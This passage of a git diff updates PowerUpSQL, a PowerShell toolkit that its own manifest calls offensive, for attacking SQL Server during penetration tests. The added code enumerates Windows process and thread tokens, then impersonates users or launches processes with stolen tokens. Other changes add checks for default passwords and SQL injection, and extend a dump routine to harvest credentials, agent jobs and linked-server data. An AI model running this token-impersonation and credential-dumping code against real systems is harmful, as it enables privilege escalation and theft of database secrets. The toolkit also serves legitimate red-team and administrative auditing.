-inotmatch "^system$" -and $_.id -ne 0} - [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server instance to connection to.')] - [string]$Instance, + #Get all tokens + foreach ($Process in $ProcessIds) + { + $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs) - [Parameter(Mandatory = $false, - HelpMessage = "Don't output anything.")] - [string]$NoOutput, + #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it. + if ($PrimaryTokenInfo -ne $null) + { + [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken - [Parameter(Mandatory = $false, - HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit, + if ($hToken -ne [IntPtr]::Zero) + { + #Get the LUID corrosponding to the logon + $ReturnObj = Get-TokenInformation -hToken $hToken + if ($ReturnObj -ne $null) + { + $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id - [Parameter(Mandatory = $false, - HelpMessage = 'Number of records to sample.')] - [int]$SampleSize = 1, + $AllTokens += $ReturnObj + } + } + else + { + Write-Warning "Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)" + } - [Parameter(Mandatory = $false, - HelpMessage = ' Column name to search for.')] - [string]$Keyword = 'Password' - ) + foreach ($Thread in $Process.Threads) + { + $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id + [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken) - Begin - { - # Table for output - $TblData = New-Object -TypeName System.Data.DataTable - $null = $TblData.Columns.Add('ComputerName') - $null = $TblData.Columns.Add('Instance') - $null = $TblData.Columns.Add('Vulnerability') - $null = $TblData.Columns.Add('Description') - $null = $TblData.Columns.Add('Remediation') - $null = $TblData.Columns.Add('Severity') - $null = $TblData.Columns.Add('IsVulnerable') - $null = $TblData.Columns.Add('IsExploitable') - $null = $TblData.Columns.Add('Exploited') - $null = $TblData.Columns.Add('ExploitCmd') - $null = $TblData.Columns.Add('Details') - $null = $TblData.Columns.Add('Reference') - $null = $TblData.Columns.Add('Author') + if ($hToken -ne [IntPtr]::Zero) + { + $ReturnObj = Get-TokenInformation -hToken $hToken + if ($ReturnObj -ne $null) + { + $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id + + $AllTokens += $ReturnObj + } + } + } + } + } + + return $AllTokens } - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + function Invoke-RevertToSelf + { + Param( + [Parameter(Position=0)] + [Switch] + $ShowOutput + ) - # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: SEARCH DATA BY COLUMN" + $Success = $RevertToSelf.Invoke() - # Test connection to server - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if(-not $TestConnection) - { - # Status user - Write-Verbose -Message "$Instance : CONNECTION FAILED" - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" - Return - } - else + if ($ShowOutput) { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS" + if ($Success) + { + Write-Host "RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" + } + else + { + Write-Host "RevertToSelf failed. Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)" + } } + } - # -------------------------------------------- - # Set function meta data for report output - # -------------------------------------------- - if($Exploit) - { - $TestMode = 'Exploit' - } - else - { - $TestMode = 'Audit' - } - $Vulnerability = 'Potentially Sensitive Columns Found' - $Description = 'Columns were found in non default databases that may contain sensitive information.' - $Remediation = 'Ensure that all passwords and senstive data are masked, hashed, or encrypted.' - $Severity = 'Informational' - $IsVulnerable = 'No' - $IsExploitable = 'No' - $Exploited = 'No' - $ExploitCmd = "Invoke-SQLAuditSampleDataByColumn -Instance $Instance -Exploit" - $Details = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms188348.aspx' - $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' - # ----------------------------------------------------------------- - # Check for the Vulnerability - # Note: Typically a missing patch or weak configuration - # ----------------------------------------------------------------- - Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." - $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -ColumnNameSearch $Keyword -NoDefaults -SuppressVerbose - if($Columns) + #Main function + function Main + { + #If running in session 0, force NoUI + if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) { - $IsVulnerable = 'Yes' + Write-Verbose "Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)" + $NoUI = $true } - else + + if ($PsCmdlet.ParameterSetName -ieq "RevToSelf") { - $IsVulnerable = 'No' + Invoke-RevertToSelf -ShowOutput } - - # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution - # ----------------------------------------------------------------- - if($IsVulnerable -eq 'Yes') + elseif ($PsCmdlet.ParameterSetName -ieq "CreateProcess" -or $PsCmdlet.ParameterSetName -ieq "ImpersonateUser") { - # List affected columns - $Columns| - ForEach-Object -Process { - $DatabaseName = $_.DatabaseName - $SchemaName = $_.SchemaName - $TableName = $_.TableName - $ColumnName = $_.ColumnName - $AffectedColumn = "[$DatabaseName].[$SchemaName].[$TableName].[$ColumnName]" - $AffectedTable = "[$DatabaseName].[$SchemaName].[$TableName]" - $Query = "USE $DatabaseName; SELECT TOP $SampleSize [$ColumnName] FROM $AffectedTable " + $AllTokens = Enum-AllTokens + + #Select the token to use + [IntPtr]$hToken = [IntPtr]::Zero + $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser + if ($Username -ne $null -and $Username -ne '') + { + if ($UniqueTokens.ContainsKey($Username)) + { + $hToken = $UniqueTokens[$Username].hToken + Write-Verbose "Selecting token by username" + } + else + { + Write-Error "A token belonging to the specified username was not found. Username: $($Username)" -ErrorAction Stop + } + } + elseif ( $ProcessId -ne $null -and $ProcessId -ne 0) + { + foreach ($Token in $AllTokens) + { + if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId) + { + $hToken = $Token.hToken + Write-Verbose "Selecting token by ProcessID" + } + } - Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" + if ($hToken -eq [IntPtr]::Zero) + { + Write-Error "A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop + } + } + elseif ($ThreadId -ne $null -and $ThreadId -ne 0) + { + foreach ($Token in $AllTokens) + { + if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId) + { + $hToken = $Token.hToken + Write-Verbose "Selecting token by ThreadId" + } + } - # ------------------------------------------------------------------ - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role, get data - # ------------------------------------------------------------------ - if($IsVulnerable -eq 'Yes') + if ($hToken -eq [IntPtr]::Zero) + { + Write-Error "A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened." -ErrorAction Stop + } + } + elseif ($Process -ne $null) + { + foreach ($Token in $AllTokens) { - $TblTargetColumns | - ForEach-Object -Process { - # Add sample data - Write-Verbose -Message "$Instance : - EXPLOITING: Selecting data sample from column $AffectedColumn." + if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id) + { + $hToken = $Token.hToken - # Query for data - $DataSample = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | - ConvertTo-Csv -NoTypeInformation | - Select-Object -Skip 1 - if($DataSample) - { - $Details = "Data sample from $AffectedColumn : $DataSample." - } - else - { - $Details = "No data found in affected column: $AffectedColumn." + if($Instance){ + Write-Verbose "$Instance : Selecting token by Process object" + }else{ + Write-Verbose "Selecting token by Process object" } - $IsExploitable = 'Yes' - $Exploited = 'Yes' - - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } - else + + if ($hToken -eq [IntPtr]::Zero) { - # Add affected column list - $Details = "Affected column: $AffectedColumn." - $IsExploitable = 'Yes' - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + Write-Error "A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened." -ErrorAction Stop + } + } + else + { + Write-Error "Must supply a Username, ProcessId, ThreadId, or Process object" -ErrorAction Stop + } + + #Use the token for the selected action + if ($PsCmdlet.ParameterSetName -ieq "CreateProcess") + { + if (-not $NoUI) + { + Set-DesktopACLs } + + Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru + + Invoke-RevertToSelf + } + elseif ($ImpersonateUser) + { + Invoke-ImpersonateUser -hToken $hToken | Out-Null + Write-Host "Running As: $([Environment]::UserDomainName)\$([Environment]::UserName)" } + + Free-AllTokens -TokenInfoObjs $AllTokens } - else + elseif ($PsCmdlet.ParameterSetName -ieq "WhoAmI") { - Write-Verbose -Message "$Instance : - No columns were found that matched the search." + Write-Host "$([Environment]::UserDomainName)\$([Environment]::UserName)" } + else #Enumerate tokens + { + $AllTokens = Enum-AllTokens - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" - } + if ($PsCmdlet.ParameterSetName -ieq "ShowAll") + { + Write-Host $AllTokens + } + else + { + Write-Host (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values + } - End - { - # Return data - if ( -not $NoOutput) - { - Return $TblData + Invoke-RevertToSelf + + Free-AllTokens -TokenInfoObjs $AllTokens } } + + + #Start the main function + Main } -#endregion -######################################################################### -# -#region THIRD PARTY FUNCTIONS -# -######################################################################### # ------------------------------------------- # Function: Test-IsLuhnValid # ------------------------------------------- -# Author: ØYVIND KALLSTAD +# Author: ktaranov # Source: https://communary.net/2016/02/19/the-luhn-algorithm/ function Test-IsLuhnValid { @@ -12758,7 +25589,7 @@ function Test-IsLuhnValid .OUTPUTS System.Boolean .NOTES - Author: ØYVIND KALLSTAD + Author: OYVIND KALLSTAD Date: 19.02.2016 Version: 1.0 Dependencies: Get-LuhnCheckSum, ConvertTo-Digits @@ -12781,11 +25612,11 @@ function Test-IsLuhnValid if ((($checksum + $checksumDigit) % 10) -eq 0 -and $NumCount -ge 12) { - Write-Output -InputObject $true + Write-Host -InputObject $true } else { - Write-Output -InputObject $false + Write-Host -InputObject $false } } @@ -12793,7 +25624,7 @@ function Test-IsLuhnValid # ------------------------------------------- # Function: ConvertTo-Digits # ------------------------------------------- -# Author: ØYVIND KALLSTAD +# Author: OYVIND KALLSTAD # Source: https://communary.net/2016/02/19/the-luhn-algorithm/ function ConvertTo-Digits { @@ -12810,7 +25641,7 @@ function ConvertTo-Digits https://communary.wordpress.com/ https://github.com/gravejester/Communary.ToolBox .NOTES - Author: ØYVIND KALLSTAD + Author: OYVIND KALLSTAD Date: 09.05.2015 Version: 1.0 #> @@ -12829,7 +25660,7 @@ function ConvertTo-Digits $digits[$i] = $digit $n = [math]::Floor($n / 10) } - Write-Output -InputObject $digits + Write-Host -InputObject $digits } @@ -13327,7 +26158,9 @@ function Invoke-Parallel } Write-Debug -Message "`$ScriptBlock: $($ScriptBlock | Out-String)" - Write-Verbose -Message 'Creating runspace pool and session states' + If (-not($SuppressVerbose)){ + Write-Verbose -Message 'Creating runspace pool and session states' + } #If specified, add variables and modules/snapins to session state @@ -13530,7 +26363,9 @@ function Invoke-Parallel #Close the runspace pool, unless we specified no close on timeout and something timed out if ( ($timedOutTasks -eq $false) -or ( ($timedOutTasks -eq $true) -and ($NoCloseOnTimeout -eq $false) ) ) { - Write-Verbose -Message 'Closing the runspace pool' + If (-not($SuppressVerbose)){ + Write-Verbose -Message 'Closing the runspace pool' + } $runspacepool.close() } @@ -13541,13 +26376,56 @@ function Invoke-Parallel } +# Source: http://www.padisetty.com/2014/05/powershell-bit-manipulation-and-network.html +# Notes: Changed name from checkSubnet to Test-Subnet (Approved Verbs) +# Updates by Ryan Cobb (cobbr) +function Test-Subnet ([string]$cidr, [string]$ip) +{ + $network, [int]$subnetlen = $cidr.Split('/') + $a = [uint32[]]$network.split('.') + [uint32] $unetwork = (Convert-BitShift $a[0] -Left 24) + (Convert-BitShift $a[1] -Left 16) + (Convert-BitShift $a[2] -Left 8) + $a[3] + + $mask = Convert-BitShift (-bnot [uint32]0) -Left (32 - $subnetlen) + + $a = [uint32[]]$ip.split('.') + [uint32] $uip = (Convert-BitShift $a[0] -Left 24) + (Convert-BitShift $a[1] -Left 16) + (Convert-BitShift $a[2] -Left 8) + $a[3] + + $unetwork -eq ($mask -band $uip) +} + +# Source: https://stackoverflow.com/questions/35116636/bit-shifting-in-powershell-2-0 +function Convert-BitShift { + param ( + [Parameter(Position = 0, Mandatory = $True)] + [int] $Number, + + [Parameter(ParameterSetName = 'Left', Mandatory = $False)] + [int] $Left, + + [Parameter(ParameterSetName = 'Right', Mandatory = $False)] + [int] $Right + ) + + $shift = 0 + if ($PSCmdlet.ParameterSetName -eq 'Left') + { + $shift = $Left + } + else + { + $shift = -$Right + } + + return [math]::Floor($Number * [math]::Pow(2,$shift)) +} + #endregion ######################################################################### # -#region Primary FUNCTIONs -# Invoke-SQLDump, Invoke-SQLAudit, Invoke-SQLEscalatePriv +#region PRIMARY FUNCTIONS +# Invoke-SQLDump, Invoke-SQLAudit, Invoke-SQLEscalatePriv # ######################################################################### @@ -13650,6 +26528,15 @@ Function Invoke-SQLAudit Begin { + + # If provided, verify write access to target directory + if($OutFolder){ + if((Test-FolderWriteAccess "$OutFolder") -eq $false){ + Write-Verbose -Message 'YOU DONT APPEAR TO HAVE WRITE ACCESS TO THE PROVIDED DIRECTORY.' + BREAK + } + } + # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') @@ -13675,6 +26562,7 @@ Function Invoke-SQLAudit Write-Verbose -Message 'LOADING VULNERABILITY CHECKS.' # Load list of vulnerability check functions - Server / database + $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditDefaultLoginPw ','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditWeakLoginPw','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivImpersonateLogin','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivServerLink','Server') @@ -13686,7 +26574,10 @@ Function Invoke-SQLAudit $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbDdlAdmin','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbOwner','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSampleDataByColumn','Database') - + $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpExecuteAs','Database') + $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpSigned','Database') + $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivAutoExecSp','Database') + Write-Verbose -Message 'RUNNING VULNERABILITY CHECKS.' } @@ -13919,7 +26810,12 @@ Function Invoke-SQLDumpInfo [Parameter(Mandatory = $false, HelpMessage = 'Write output to csv files.')] - [switch]$csv + [switch]$csv, + + [Parameter(Mandatory = $false, + HelpMessage = 'Crawl available SQL Server links.')] + [switch]$CrawlLinks + ) Begin @@ -13984,21 +26880,21 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting DatabaseUsers + # Getting Database Users Write-Verbose -Message "$Instance - Getting database users for databases..." $Results = Get-SQLDatabaseUser -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_Users.xml' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_users.xml' $Results | Export-Clixml $OutPutPath } else { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_Users.csv' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_users.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting DatabasePrivs + # Getting Database Privs Write-Verbose -Message "$Instance - Getting privileges for databases..." $Results = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) @@ -14012,7 +26908,7 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting DatabaseRoles + # Getting Database Roles Write-Verbose -Message "$Instance - Getting database roles..." $Results = Get-SQLDatabaseRole -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) @@ -14040,7 +26936,7 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting DatabaseTables + # Getting Database Schemas Write-Verbose -Message "$Instance - Getting database schemas..." $Results = Get-SQLDatabaseSchema -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) @@ -14054,7 +26950,21 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting DatabaseTables + # Getting Temp Tables + Write-Verbose -Message "$Instance - Getting temp tables..." + $Results = Get-SQLTableTemp -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_temp_tables.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_temp_tables.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Database Tables Write-Verbose -Message "$Instance - Getting database tables..." $Results = Get-SQLTable -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) @@ -14115,12 +27025,12 @@ Function Invoke-SQLDumpInfo $Results = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Configuration.xml' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_configuration.xml' $Results | Export-Clixml $OutPutPath } else { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Configuration.csv' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_configuration.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } @@ -14166,20 +27076,6 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } - # Getting Server Links - Write-Verbose -Message "$Instance - Getting server links..." - $Results = Get-SQLServerLink -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - if($xml) - { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.xml' - $Results | Export-Clixml $OutPutPath - } - else - { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.csv' - $Results | Export-Csv -NoTypeInformation $OutPutPath - } - # Getting Server Credentials Write-Verbose -Message "$Instance - Getting server credentials..." $Results = Get-SQLServerCredential -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose @@ -14213,12 +27109,97 @@ Function Invoke-SQLDumpInfo $Results = Get-SQLStoredProcedure -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_stored_procedure.xml' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + + # Getting Stored Procedures that use Global Temp Tables + Write-Verbose -Message "$Instance - Getting stored procedures that use global temp tables..." + $Results = Get-SQLStoredProcedure -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | where ProcedureDefinition -like "*##*" + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_globaltmptbl.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_globaltmptbl.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Custom XP Stored Procedures + Write-Verbose -Message "$Instance - Getting custom extended stored procedures..." + $Results = Get-SQLStoredProcedureXP -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_xp.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_xp.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting server policy + Write-Verbose -Message "$Instance - Getting server policies..." + $Results = Get-SQLServerPolicy -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_policy.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_policy.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting potential SQLi Stored Procedures + Write-Verbose -Message "$Instance - Getting stored procedures with potential SQL Injection..." + $Results = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_sqli.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_sqli.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting startup Stored Procedures + Write-Verbose -Message "$Instance - Getting startup stored procedures..." + $Results = Get-SQLStoredProcedureAutoExec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_startup.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_startup.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting CLR Stored Procedures + Write-Verbose -Message "$Instance - Getting CLR stored procedures..." + $Results = Get-SQLStoredProcedureCLR -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_clr.xml' $Results | Export-Clixml $OutPutPath } else { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_stored_procedure.csv' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_clr.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } @@ -14236,6 +27217,20 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } + # Getting Triggers DML that use Global Temp Tables + Write-Verbose -Message "$Instance - Getting DML triggers that use global temp tables..." + $Results = Get-SQLTriggerDml -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | where TriggerDefinition -like "*##*" + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml_globaltmptbl.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml_globaltmptbl.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + # Getting Triggers DDL Write-Verbose -Message "$Instance - Getting DDL triggers..." $Results = Get-SQLTriggerDdl -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose @@ -14250,23 +27245,136 @@ Function Invoke-SQLDumpInfo $Results | Export-Csv -NoTypeInformation $OutPutPath } + # Getting Triggers DDL that use Global Temp Tables + Write-Verbose -Message "$Instance - Getting DDL triggers that use global temp tables..." + $Results = Get-SQLTriggerDdl -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | where TriggerDefinition -like "*##*" + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_ddl_globaltmptbl.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_ddl_globaltmptbl.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + # Getting Version Information Write-Verbose -Message "$Instance - Getting server version information..." $Results = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.xml' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_version.xml' $Results | Export-Clixml $OutPutPath } else { - $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.csv' + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_version.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Audit Database Specification Information + Write-Verbose -Message "$Instance - Getting Database audit specification information..." + $Results = Get-SQLAuditDatabaseSpec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Database_Specifications.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Database_Specifications.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Audit Server Specification Information + Write-Verbose -Message "$Instance - Getting Server audit specification information..." + $Results = Get-SQLAuditServerSpec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit__Server_Specifications.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Server_Specifications.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Agent Jobs + Write-Verbose -Message "$Instance - Getting Agent Jobs..." + $Results = Get-SQLAgentJob -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_agent_job.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_agent_jobs.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Agent Jobs that use Global Temp Tables + Write-Verbose -Message "$Instance - Getting Agent Jobs that use global temp tables..." + $Results = Get-SQLAgentJob -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Keyword "##" + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_agent_job_globaltmptbl.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_agent_jobs_globaltmptbl.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting OLE DB provder information + Write-Verbose -Message "$Instance - Getting OLE DB provder information..." + $Results = Get-SQLOleDbProvder -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_oledbproviders.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_oledbproviders.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + + # Getting Server Links + Write-Verbose -Message "$Instance - Getting server links..." + $Results = Get-SQLServerLink -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } + # Getting Server Links via Crawl + if($CrawlLinks){ + Write-Verbose -Message "$Instance - Crawling linked servers..." + $Results = Get-SQLServerLinkCrawl -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Export2 + if($xml) + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links_crawl.xml' + $Results | Export-Clixml $OutPutPath + } + else + { + $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links_crawl.csv' + $Results | Export-Csv -NoTypeInformation $OutPutPath + } + } + Write-Verbose -Message "$Instance - END" } - End { } diff --git a/PowerUpSQL.psd1 b/PowerUpSQL.psd1 index 3bda2d5..6b6b2bb 100644 --- a/PowerUpSQL.psd1 +++ b/PowerUpSQL.psd1 @@ -1,14 +1,17 @@ #requires -Version 1 @{ ModuleToProcess = 'PowerUpSQL.psm1' - ModuleVersion = '1.0.0.23' + ModuleVersion = '1.105.0' GUID = 'dd1fe106-2226-4869-9363-44469e930a4a' Author = 'Scott Sutherland' Copyright = 'BSD 3-Clause' Description = 'PowerUpSQL is an offensive toolkit designed for attacking SQL Server. The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale. It is intended to be used during penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to inventory the SQL Servers on their ADS domain very quickly. More information can be found at 